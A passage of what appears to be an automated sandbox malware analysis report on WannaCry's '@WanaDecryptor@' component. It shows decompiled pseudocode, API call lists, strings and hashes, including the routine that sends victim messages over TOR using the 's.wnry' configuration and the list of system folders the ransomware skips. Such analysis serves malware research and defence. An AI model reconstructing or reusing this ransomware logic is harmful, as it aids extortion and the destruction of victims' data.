                                                      • #5710.MFC42(?,?), ref: 004053B8
                                                      • #4129.MFC42(?,?,?,?), ref: 004053D7
                                                      • #922.MFC42(?,?,00000000,?,?,?,?), ref: 004053ED
                                                      • #858.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 004053FA
                                                      • #800.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 00405407
                                                      • #800.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 00405415
                                                      • #800.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 00405426
                                                      • #4129.MFC42(?,?), ref: 00405443
                                                      • #4277.MFC42(?,?,?,?), ref: 0040545B
                                                      • #922.MFC42(?,00000000,?,?,?,?,?), ref: 00405471
                                                      • #858.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 0040547E
                                                      • #800.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 0040548B
                                                      • #800.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 00405499
                                                      • #800.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 004054AA
                                                      • #6778.MFC42(?,00000001), ref: 004054EA
                                                      • #6648.MFC42(00000000,00000001,?,00000001), ref: 004054F4
                                                      • #6778.MFC42(00000000,?), ref: 00405536
                                                      • #6648.MFC42(?,00000001,00000000,?), ref: 00405545
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0040555A
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #800$#858$#4129#922$#4277#5710#6648#6778#940$#923InvalidateRect
                                                      • String ID:
                                                      • API String ID: 2121400562-0
                                                      • Opcode ID: b4a9873a0028e0a5de6b54efbba54189251206de77b36b87668466cc29092242
                                                      • Instruction ID: 4ea7c19ebb0ecad4eacefd8b4ebc091e45acf9db756171f3a68d6c32b1a6cadd
                                                      • Opcode Fuzzy Hash: b4a9873a0028e0a5de6b54efbba54189251206de77b36b87668466cc29092242
                                                      • Instruction Fuzzy Hash: A4A1B770204B81AFC714DB29C590A6FB7E6EFD4304F040A1EF596D3391D7B8E8558B66
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004082C0 Relevance: 47.4, APIs: 21, Strings: 6, Instructions: 181fileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 56%
                                                      			E004082C0(void* __ecx) {
				void* __ebp;
				signed int _t44;
				void* _t45;
				void* _t47;
				signed int _t48;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t59;
				void* _t60;
				signed int _t65;
				signed int _t90;
				signed int _t91;
				signed int _t104;
				intOrPtr* _t106;
				struct _IO_FILE* _t107;
				signed int _t108;
				void* _t111;
				intOrPtr _t114;
				void* _t115;
				void* _t116;
				void* _t118;
				void* _t120;

				_push(0xffffffff);
				_push(E00413FCE);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t114;
				_t115 = _t114 - 0x8c;
				_t111 = __ecx;
				 *((intOrPtr*)(_t115 + 0xa4)) = 0;
				_t44 =  *( *((intOrPtr*)(_t115 + 0xac)) - 8);
				if(_t44 > 0x3e8) {
					_push(0x3e8);
					_push(0);
					_push(_t115 + 0x14);
					L00412F6E();
					_push(_t44);
					 *((char*)(_t115 + 0xa8)) = 1;
					L00412D9A();
					 *((char*)(_t115 + 0xa4)) = 0;
					L00412CC2();
				}
				if( *( *((intOrPtr*)(_t115 + 0xac)) - 8) >= 0xa) {
					_t106 = __imp__time;
					_t45 =  *_t106(0);
					_t90 =  *0x4218a8; // 0x0
					_t116 = _t115 + 4;
					__eflags = _t45 - _t90 - 0xb4;
					if(_t45 - _t90 >= 0xb4) {
						L13:
						_t47 =  *_t106(0);
						_t91 =  *0x4218a8; // 0x0
						_t116 = _t116 + 4;
						_t48 = _t47 - _t91;
						__eflags = _t48 - 0xe10;
						if(_t48 <= 0xe10) {
							L9:
							__eflags =  *0x4218ac - 3; // 0x0
							if(__eflags < 0) {
								L15:
								 *((intOrPtr*)(_t116 + 0x14)) = 0;
								memset(_t116 + 0x18, 0, 0x21 << 2);
								_t51 = fopen("00000000.res", "rb");
								_t107 = _t51;
								_t118 = _t116 + 0x14;
								__eflags = _t107;
								if(_t107 != 0) {
									fread(_t118 + 0x1c, 0x88, 1, _t107);
									fclose(_t107);
									E0040BE90("s.wnry", _t111 + 0x6ea, _t111 + 0x74e);
									_push(0);
									_push( *((intOrPtr*)(_t118 + 0xcc)));
									_push(_t118 + 0x38);
									_push(_t111 + 0x5f0);
									_t56 = E0040C060( *((intOrPtr*)(_t118 + 0xcc)), __eflags);
									_t118 = _t118 + 0x30;
									_t108 = _t56;
									E0040C670();
									_t58 =  *(_t118 + 0xb0);
									__eflags = _t108;
									if(_t108 < 0) {
										__eflags = _t58;
										if(_t58 != 0) {
											_push(0);
											_push(0x30);
											_push("Failed to send your message!\nPlease make sure that your computer is connected to the Internet and \nyour Internet Service Provider (ISP) does not block connections to the TOR Network!");
											L00412CC8();
										}
									} else {
										__eflags = _t58;
										if(_t58 != 0) {
											L00412CC8();
											__imp__time(0, "Your message has been sent successfully!", 0x40, 0);
											_t118 = _t118 + 4;
											 *0x4218a8 = _t58;
										}
									}
									 *((intOrPtr*)(_t118 + 0xa4)) = 0xffffffff;
									L00412CC2();
									_t59 = _t108;
								} else {
									 *((intOrPtr*)(_t118 + 0xa4)) = 0xffffffff;
									L00412CC2();
									_t59 = _t51 | 0xffffffff;
								}
								L23:
								 *[fs:0x0] =  *((intOrPtr*)(_t118 + 0x9c));
								return _t59;
							}
							__eflags =  *(_t116 + 0xb0);
							if( *(_t116 + 0xb0) != 0) {
								L00412DA6();
								 *((char*)(_t116 + 0xa8)) = 2;
								_t60 =  *_t106(0);
								_t104 =  *0x4218a8; // 0x0
								_t120 = _t116 + 4;
								__eflags = 0x3d;
								_push(0x3d - ((0x88888889 * (_t60 - _t104) >> 0x20) + _t60 - _t104 >> 5) + ((0x88888889 * (_t60 - _t104) >> 0x20) + _t60 - _t104 >> 5 >> 0x1f));
								_push("You are sending too many mails! Please try again %d minutes later.");
								_push(_t120 + 0x10);
								L00412E00();
								_t48 =  *(_t120 + 0x1c);
								_t116 = _t120 + 0xc;
								_push(0);
								_push(0);
								_push(_t48);
								L00412CC8();
								 *((char*)(_t116 + 0xa4)) = 0;
								L00412CC2();
							}
							 *((intOrPtr*)(_t116 + 0xa4)) = 0xffffffff;
							L00412CC2();
							_t59 = _t48 | 0xffffffff;
							goto L23;
						}
						 *0x4218ac = 0;
						goto L15;
					}
					_t65 =  *0x4218ac; // 0x0
					__eflags = _t65 - 3;
					if(_t65 >= 3) {
						goto L13;
					}
					_t48 = _t65 + 1;
					__eflags = _t48;
					 *0x4218ac = _t48;
					goto L9;
				}
				if( *((intOrPtr*)(_t115 + 0xb0)) != 0) {
					_push(0);
					_push(0);
					_push("Too short message!");
					L00412CC8();
				}
				 *((intOrPtr*)(_t115 + 0xa4)) = 0xffffffff;
				L00412CC2();
				_t59 = _t44 | 0xffffffff;
				goto L23;
			}


























                                                      0x004082c0
                                                      0x004082c2
                                                      0x004082cd
                                                      0x004082ce
                                                      0x004082d5
                                                      0x004082df
                                                      0x004082ea
                                                      0x004082f1
                                                      0x004082f9
                                                      0x004082fb
                                                      0x00408304
                                                      0x00408305
                                                      0x0040830d
                                                      0x00408312
                                                      0x0040831a
                                                      0x00408322
                                                      0x0040832b
                                                      0x00408332
                                                      0x00408332
                                                      0x00408342
                                                      0x00408378
                                                      0x0040837f
                                                      0x00408381
                                                      0x00408387
                                                      0x00408391
                                                      0x00408396
                                                      0x0040844d
                                                      0x0040844e
                                                      0x00408450
                                                      0x00408456
                                                      0x00408459
                                                      0x0040845b
                                                      0x00408460
                                                      0x004083af
                                                      0x004083af
                                                      0x004083b5
                                                      0x0040846c
                                                      0x00408477
                                                      0x00408485
                                                      0x00408487
                                                      0x0040848d
                                                      0x0040848f
                                                      0x00408492
                                                      0x00408494
                                                      0x004084c2
                                                      0x004084c9
                                                      0x004084e2
                                                      0x004084ee
                                                      0x004084f3
                                                      0x004084fa
                                                      0x004084fb
                                                      0x004084fc
                                                      0x00408501
                                                      0x00408504
                                                      0x00408506
                                                      0x0040850b
                                                      0x00408512
                                                      0x00408514
                                                      0x00408538
                                                      0x0040853a
                                                      0x0040853c
                                                      0x0040853d
                                                      0x0040853f
                                                      0x00408544
                                                      0x00408544
                                                      0x00408516
                                                      0x00408516
                                                      0x00408518
                                                      0x00408522
                                                      0x00408528
                                                      0x0040852e
                                                      0x00408531
                                                      0x00408531
                                                      0x00408518
                                                      0x00408550
                                                      0x0040855b
                                                      0x00408560
                                                      0x00408496
                                                      0x0040849d
                                                      0x004084a8
                                                      0x004084ad
                                                      0x004084ad
                                                      0x00408562
                                                      0x0040856d
                                                      0x0040857a
                                                      0x0040857a
                                                      0x004083bb
                                                      0x004083c2
                                                      0x004083c8
                                                      0x004083ce
                                                      0x004083d6
                                                      0x004083d8
                                                      0x004083f5
                                                      0x004083fd
                                                      0x00408403
                                                      0x00408404
                                                      0x00408409
                                                      0x0040840a
                                                      0x0040840f
                                                      0x00408413
                                                      0x00408416
                                                      0x00408417
                                                      0x00408418
                                                      0x00408419
                                                      0x00408422
                                                      0x00408429
                                                      0x00408429
                                                      0x00408435
                                                      0x00408440
                                                      0x00408445
                                                      0x00000000
                                                      0x00408445
                                                      0x00408466
                                                      0x00000000
                                                      0x00408466
                                                      0x0040839c
                                                      0x004083a1
                                                      0x004083a3
                                                      0x00000000
                                                      0x00000000
                                                      0x004083a9
                                                      0x004083a9
                                                      0x004083aa
                                                      0x00000000
                                                      0x004083aa
                                                      0x0040834b
                                                      0x0040834d
                                                      0x0040834e
                                                      0x0040834f
                                                      0x00408354
                                                      0x00408354
                                                      0x00408360
                                                      0x0040836b
                                                      0x00408370
                                                      0x00000000

                                                      APIs
                                                      • #4278.MFC42(000003E8,00000000,000003E8,?,?,77005C80), ref: 0040830D
                                                      • #858.MFC42 ref: 00408322
                                                      • #800.MFC42 ref: 00408332
                                                      • #1200.MFC42(Too short message!,00000000,00000000,?,?,77005C80), ref: 00408354
                                                      • #800.MFC42 ref: 0040836B
                                                      • time.MSVCRT ref: 0040837F
                                                      • #540.MFC42 ref: 004083C8
                                                      • time.MSVCRT ref: 004083D6
                                                      • #2818.MFC42(?,You are sending too many mails! Please try again %d minutes later.,0000003D,00000000), ref: 0040840A
                                                      • #1200.MFC42(?,00000000,00000000,?,?,?,00000000), ref: 00408419
                                                      • #800.MFC42(?,00000000,00000000,?,?,?,00000000), ref: 00408429
                                                      • #800.MFC42 ref: 00408440
                                                      • time.MSVCRT ref: 0040844E
                                                      • fopen.MSVCRT ref: 00408487
                                                      • #800.MFC42 ref: 004084A8
                                                      • fread.MSVCRT ref: 004084C2
                                                      • fclose.MSVCRT ref: 004084C9
                                                      • #1200.MFC42(Your message has been sent successfully!,00000040,00000000), ref: 00408522
                                                      • time.MSVCRT ref: 00408528
                                                      • #1200.MFC42(Failed to send your message!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!,00000030,00000000), ref: 00408544
                                                      • #800.MFC42 ref: 0040855B
                                                      Strings
                                                      • Too short message!, xrefs: 0040834F
                                                      • s.wnry, xrefs: 004084DD
                                                      • Failed to send your message!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!, xrefs: 0040853F
                                                      • 00000000.res, xrefs: 00408480
                                                      • Your message has been sent successfully!, xrefs: 0040851D
                                                      • You are sending too many mails! Please try again %d minutes later., xrefs: 00408404
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #800$#1200time$#2818#4278#540#858fclosefopenfread
                                                      • String ID: 00000000.res$Failed to send your message!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!$Too short message!$You are sending too many mails! Please try again %d minutes later.$Your message has been sent successfully!$s.wnry
                                                      • API String ID: 1233543560-382338106
                                                      • Opcode ID: 6aef2977620d67d742a0f30d3b6c329b2d4c4f80cce0edf1bcad665571c82898
                                                      • Instruction ID: 9ef4e74ff6f5855000ff98dc085b89da37e67c7abdef0d08bf307c22ead08a72
                                                      • Opcode Fuzzy Hash: 6aef2977620d67d742a0f30d3b6c329b2d4c4f80cce0edf1bcad665571c82898
                                                      • Instruction Fuzzy Hash: D6610371604340EFD330EB28DD81BEFB795AB90324F444A3EF199932D0DB78594586AB
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004086E0 Relevance: 40.6, APIs: 20, Strings: 3, Instructions: 324windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 79%
                                                      			E004086E0(intOrPtr* __ecx, void* __ebp, signed long long __fp0) {
				struct HBRUSH__* _v8;
				char _v16;
				char _v28;
				intOrPtr _v36;
				char _v52;
				char _v76;
				char _v88;
				intOrPtr _v120;
				intOrPtr _v124;
				struct HDC__* _v128;
				signed int _v132;
				void* _v136;
				char _v144;
				signed int _v148;
				struct HBRUSH__* _v152;
				intOrPtr _v156;
				struct HBRUSH__* _v160;
				char _v164;
				void* _v168;
				long _v172;
				char _v176;
				char _v180;
				struct tagRECT _v196;
				intOrPtr _v200;
				char* _v204;
				signed int _v208;
				signed int _v212;
				char _v216;
				intOrPtr _v220;
				char _v224;
				char _v228;
				struct HBRUSH__* _v232;
				intOrPtr _v236;
				char _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				struct HDC__* _v252;
				char _v256;
				struct HBRUSH__* _v260;
				struct HBRUSH__* _v264;
				char _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				char _v280;
				struct HBRUSH__* _v284;
				struct HBRUSH__* _v288;
				char _v292;
				intOrPtr _v300;
				char _v324;
				signed int _t146;
				intOrPtr _t148;
				signed int _t150;
				void* _t152;
				intOrPtr _t155;
				char _t163;
				char* _t165;
				RECT* _t177;
				struct HBRUSH__* _t182;
				intOrPtr _t206;
				signed int _t276;
				intOrPtr _t277;
				intOrPtr* _t281;
				void* _t283;
				long _t284;
				intOrPtr _t286;
				intOrPtr _t291;
				signed long long _t299;
				signed long long _t301;
				signed long long _t303;

				_t299 = __fp0;
				_t283 = __ebp;
				_push(0xffffffff);
				_push(E00414055);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t286;
				_t281 = __ecx;
				_push(__ecx);
				L00412DD0();
				_v8 = 0;
				GetClientRect( *(__ecx + 0x20),  &(_v196.right));
				_v172 = SendMessageA( *(_t281 + 0x20), 0x408, 0, 0);
				_push( &_v164);
				_push( &_v168);
				L00412FFE();
				L00412E54();
				_v16 = 1;
				E00407640( &_v240);
				_v240 = 0x41675c;
				_t206 = _v120;
				_t146 = 0 | _t206 == 0x00000000;
				_v16 = 2;
				_v256 = 0x4166e0;
				_v228 =  &_v132;
				_v232 = 0;
				_v208 = _t146;
				if(_t146 == 0) {
					_v244 = _t206;
					_v248 = _v124;
					_v252 = _v128;
				} else {
					 *((intOrPtr*)(_v132 + 0x58))( &_v224);
					asm("sbb eax, eax");
					_push(CreateCompatibleDC( ~( &_v136) & _v132));
					L00412E4E();
					E00409E70( &_v252,  &_v144, _v228 - _v236, _v224 - _v232);
					_t35 =  &_v264; // 0x41675c
					_v260 = E00409F10( &_v280, _t35);
					_push(_v248);
					_push(_v252);
					_push( &_v76);
					L00412FF8();
				}
				_v16 = 3;
				_v204 =  &_v256;
				_t148 =  *((intOrPtr*)(_t281 + 0x5c));
				_t291 = _t148;
				if(_t291 == 0) {
					_push( *((intOrPtr*)(_t281 + 0x58)));
					_push( &_v196);
					L00412FF2();
				} else {
					if(_t291 != 0) {
						_t182 =  *(_t148 + 4);
					} else {
						_t182 = 0;
					}
					FillRect(_v252,  &_v196, _t182);
				}
				_push(_t281 + 0x74);
				L00412FEC();
				_t150 = _v196.top;
				if(_t150 < _v196.right.left || _t150 > _v196.bottom) {
					_v268 = 0x4166e0;
					_v28 = 5;
					if(_v220 == 0) {
						_v260 = 0;
						_v264 = 0;
					} else {
						_t153 = _v232;
						E00409F80(_v240, _v236, _v232, _v228 - _v236, _v224 - _v232,  &_v268, _v236, _t153, 0xcc0020);
						_t155 = _v276;
						if(_t155 != 0) {
							_push( *((intOrPtr*)(_t155 + 4)));
							_push(_v264);
							L00412E48();
						} else {
							_push(0);
							_push(_v264);
							L00412E48();
						}
					}
					_v28 = 4;
				} else {
					L00412FE6();
					_v212 = _t150;
					_t276 = _t150 & 0x00008000;
					_v148 = _t150 & 0x00002000;
					_v180 = 0;
					_v176 = 0;
					_v168 = 0;
					_v164 = 0;
					_v160 = 0;
					_v152 = 0;
					if((_t150 & 0x00000004) == 0) {
						_v156 = _v200 - _v208;
					} else {
						_v156 = _v196.left - _v204;
					}
					asm("fild dword [esp+0x80]");
					_push(_t283);
					_t284 = _v196.right.left;
					_t163 = _v196.top - _t284;
					_v272 = _v196.bottom - _t284;
					asm("fild dword [esp+0x10]");
					_v272 = _t163;
					asm("fild dword [esp+0x10]");
					_t301 = _t299 * st2 / st1;
					L0041304A();
					_v172 = _t163;
					if(_t276 == 0) {
						st0 = _t301;
						st0 = _t301;
					} else {
						_v272 =  *((intOrPtr*)(_t281 + 0x68)) - _t284;
						asm("fild dword [esp+0x10]");
						_t303 = _t301 * st2 / st1;
						L0041304A();
						st0 = _t303;
						st0 = _t303;
						_v180 = _t163;
					}
					_t277 =  *((intOrPtr*)(_t281 + 0x54));
					if(_t277 == 0) {
						_t165 =  &_v180;
						if(_v148 == 0) {
							_t165 =  &_v164;
						}
						 *((intOrPtr*)( *_t281 + 0xc0))( &_v216, _t165,  &_v180);
					} else {
						_t177 = E00409D40( &_v52,  &_v216,  &_v180);
						if(_t277 != 0) {
							FillRect(_v264, _t177,  *(_t277 + 4));
						} else {
							FillRect(_v264, _t177, 0);
						}
					}
					 *((intOrPtr*)( *_t281 + 0xc8))( &_v228,  &_v176,  &(_v196.top));
					_v292 = 0x4166e0;
					_v52 = 7;
					if(_v244 == 0) {
						_v284 = 0;
						_v288 = 0;
						_v52 = 6;
					} else {
						_t172 = _v256;
						E00409F80(_v264, _v260, _v256, _v252 - _v260, _v248 - _v256,  &_v292, _v260, _t172, 0xcc0020);
						_t112 =  &_v324; // 0x4166e0
						E00409F10(_t112, _v300);
						_v88 = 6;
					}
				}
				_t133 =  &_v252; // 0x41675c
				_t152 = E00409E20(_t133);
				_v28 = 0;
				L00412E3C();
				_v28 = 0xffffffff;
				L00412DB8();
				 *[fs:0x0] = _v36;
				return _t152;
			}








































































                                                      0x004086e0
                                                      0x004086e0
                                                      0x004086e0
                                                      0x004086e2
                                                      0x004086ed
                                                      0x004086ee
                                                      0x004086fd
                                                      0x00408700
                                                      0x00408708
                                                      0x00408718
                                                      0x0040871f
                                                      0x00408736
                                                      0x00408742
                                                      0x00408743
                                                      0x00408746
                                                      0x0040874f
                                                      0x00408758
                                                      0x00408760
                                                      0x00408765
                                                      0x0040876d
                                                      0x0040877d
                                                      0x00408789
                                                      0x00408791
                                                      0x00408795
                                                      0x00408799
                                                      0x0040879d
                                                      0x004087a1
                                                      0x0040883f
                                                      0x0040884a
                                                      0x0040884e
                                                      0x004087a7
                                                      0x004087ba
                                                      0x004087cd
                                                      0x004087d8
                                                      0x004087dd
                                                      0x00408804
                                                      0x00408809
                                                      0x0040881f
                                                      0x00408823
                                                      0x0040882b
                                                      0x0040882c
                                                      0x00408831
                                                      0x00408831
                                                      0x00408856
                                                      0x0040885e
                                                      0x00408862
                                                      0x00408865
                                                      0x00408867
                                                      0x0040888c
                                                      0x0040888d
                                                      0x00408892
                                                      0x00408869
                                                      0x00408869
                                                      0x0040886f
                                                      0x0040886b
                                                      0x0040886b
                                                      0x0040886b
                                                      0x0040887d
                                                      0x0040887d
                                                      0x0040889e
                                                      0x0040889f
                                                      0x004088a4
                                                      0x004088ae
                                                      0x00408a7d
                                                      0x00408a85
                                                      0x00408a8f
                                                      0x00408ae5
                                                      0x00408ae9
                                                      0x00408a91
                                                      0x00408a91
                                                      0x00408ab9
                                                      0x00408abe
                                                      0x00408ac4
                                                      0x00408ad8
                                                      0x00408add
                                                      0x00408ade
                                                      0x00408ac6
                                                      0x00408ac8
                                                      0x00408acd
                                                      0x00408ace
                                                      0x00408ace
                                                      0x00408ac4
                                                      0x00408aed
                                                      0x004088be
                                                      0x004088c0
                                                      0x004088c9
                                                      0x004088d0
                                                      0x004088dd
                                                      0x004088e4
                                                      0x004088e8
                                                      0x004088ec
                                                      0x004088f0
                                                      0x004088f4
                                                      0x004088f8
                                                      0x004088ff
                                                      0x0040891e
                                                      0x00408901
                                                      0x0040890b
                                                      0x0040890b
                                                      0x0040892d
                                                      0x00408934
                                                      0x00408935
                                                      0x0040893b
                                                      0x0040893d
                                                      0x00408941
                                                      0x00408945
                                                      0x00408949
                                                      0x0040894f
                                                      0x00408951
                                                      0x00408958
                                                      0x0040895c
                                                      0x0040897e
                                                      0x00408980
                                                      0x0040895e
                                                      0x00408963
                                                      0x00408967
                                                      0x0040896d
                                                      0x0040896f
                                                      0x00408974
                                                      0x00408976
                                                      0x00408978
                                                      0x00408978
                                                      0x00408982
                                                      0x00408988
                                                      0x004089d3
                                                      0x004089d7
                                                      0x004089d9
                                                      0x004089d9
                                                      0x004089ec
                                                      0x0040898a
                                                      0x0040899e
                                                      0x004089a5
                                                      0x004089c2
                                                      0x004089a7
                                                      0x004089b0
                                                      0x004089b0
                                                      0x004089a5
                                                      0x00408a05
                                                      0x00408a0b
                                                      0x00408a17
                                                      0x00408a21
                                                      0x00408a6b
                                                      0x00408a6f
                                                      0x00408a73
                                                      0x00408a23
                                                      0x00408a23
                                                      0x00408a4b
                                                      0x00408a54
                                                      0x00408a59
                                                      0x00408a5e
                                                      0x00408a5e
                                                      0x00408a21
                                                      0x00408af5
                                                      0x00408af9
                                                      0x00408b02
                                                      0x00408b09
                                                      0x00408b15
                                                      0x00408b20
                                                      0x00408b2f
                                                      0x00408b3c

                                                      APIs
                                                      • #470.MFC42 ref: 00408708
                                                      • GetClientRect.USER32(?,?), ref: 0040871F
                                                      • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 00408730
                                                      • #6734.MFC42(?,?), ref: 00408746
                                                      • #323.MFC42(?,?), ref: 0040874F
                                                      • CreateCompatibleDC.GDI32(?), ref: 004087D2
                                                      • #1640.MFC42(00000000), ref: 004087DD
                                                        • Part of subcall function 00409E70: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00409E85
                                                        • Part of subcall function 00409E70: #1641.MFC42(00000000,?,00408809,?,?,?,00000000), ref: 00409E8E
                                                        • Part of subcall function 00409F10: #5785.MFC42(?,?,00408A5E,?,?,?,?,?,?,?,?,00CC0020), ref: 00409F1D
                                                      • #6194.MFC42(?,?,?,\gA,?,?,?,00000000), ref: 00408831
                                                      • FillRect.USER32(?,?,?), ref: 0040887D
                                                      • #2754.MFC42(?,?), ref: 00408892
                                                      • #2381.MFC42(?,?,?), ref: 0040889F
                                                      • #3797.MFC42(?,?,?), ref: 004088C0
                                                      • _ftol.MSVCRT ref: 00408951
                                                      • _ftol.MSVCRT ref: 0040896F
                                                      • FillRect.USER32(?,00000000,00000000), ref: 004089B0
                                                      • #640.MFC42(?,?,?), ref: 00408B09
                                                      • #755.MFC42(?,?,?), ref: 00408B20
                                                        • Part of subcall function 00409F80: BitBlt.GDI32(?,?,?,?,\gA,?,\gA,\gA,\gA), ref: 00409FB3
                                                        • Part of subcall function 00409F10: #5785.MFC42(?,?,00408A5E,?,?,?,?,?,?,?,?,00CC0020), ref: 00409F2D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Rect$#5785CompatibleCreateFill_ftol$#1640#1641#2381#2754#323#3797#470#6194#640#6734#755BitmapClientMessageSend
                                                      • String ID: \gA$fA$fA
                                                      • API String ID: 1027735583-2217880857
                                                      • Opcode ID: 6ed80f763e045306e10188d4e497fb721b5fce89834b9b0f8741aa09041edacc
                                                      • Instruction ID: b72dd9534e9f1d52b621f8c4883ea919de29669ae4f9aefa89eb3b477b52946b
                                                      • Opcode Fuzzy Hash: 6ed80f763e045306e10188d4e497fb721b5fce89834b9b0f8741aa09041edacc
                                                      • Instruction Fuzzy Hash: 33D12CB16083419FC314DF25C984AAFBBE9BBC8304F508E2EF1D993291DB749949CB56
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00402AF0 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 133COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _wcsicmp$_wcsnicmpwcsstr
                                                      • String ID: This folder protects against ransomware. Modifying it will reduce protection$Content.IE5$N(@$Temporary Internet Files$\AppData\Local\Temp$\Intel$\Local Settings\Temp$\Program Files$\Program Files (x86)$\ProgramData$\WINDOWS
                                                      • API String ID: 2817753184-2613825984
                                                      • Opcode ID: 5c5dcd1e390a91f16435822322ea41988894e25d1b71caeb8710faf8d967a9e6
                                                      • Instruction ID: 690a6d88e0cbcba8c0a0bc490ea4abea364cf6131422823267360e98b5ddcfca
                                                      • Opcode Fuzzy Hash: 5c5dcd1e390a91f16435822322ea41988894e25d1b71caeb8710faf8d967a9e6
                                                      • Instruction Fuzzy Hash: 3831843235162023D520691D7D4AFCB638C8FE5727F554033FD44E52C1E29EB96A82BD
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00401760 Relevance: 38.6, APIs: 17, Strings: 5, Instructions: 140filesynchronizationthreadCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 61%
                                                      			E00401760(void* __ecx) {
				int _v8;
				intOrPtr _v12;
				char _v20;
				struct _IO_FILE* _v32;
				void _v2059;
				void _v2060;
				void _v2571;
				void _v2572;
				char _v2576;
				char _v2604;
				void* _v2608;
				char _v2616;
				void* _v2636;
				void* _v2640;
				void* _t36;
				struct _IO_FILE* _t37;
				signed int _t38;
				unsigned int _t45;
				signed int _t49;
				void* _t50;
				signed int _t67;
				struct _IO_FILE* _t87;
				void* _t94;
				void* _t97;
				intOrPtr _t98;
				void* _t99;

				_push(0xffffffff);
				_push(E004134C6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t98;
				_t99 = _t98 - 0xa28;
				_t94 = __ecx;
				L00412CD4();
				_t36 =  *(__ecx + 0xac);
				if(_t36 != 0) {
					WaitForSingleObject(_t36, 0xbb8);
					TerminateThread( *(_t94 + 0xac), 0);
					CloseHandle( *(_t94 + 0xac));
				}
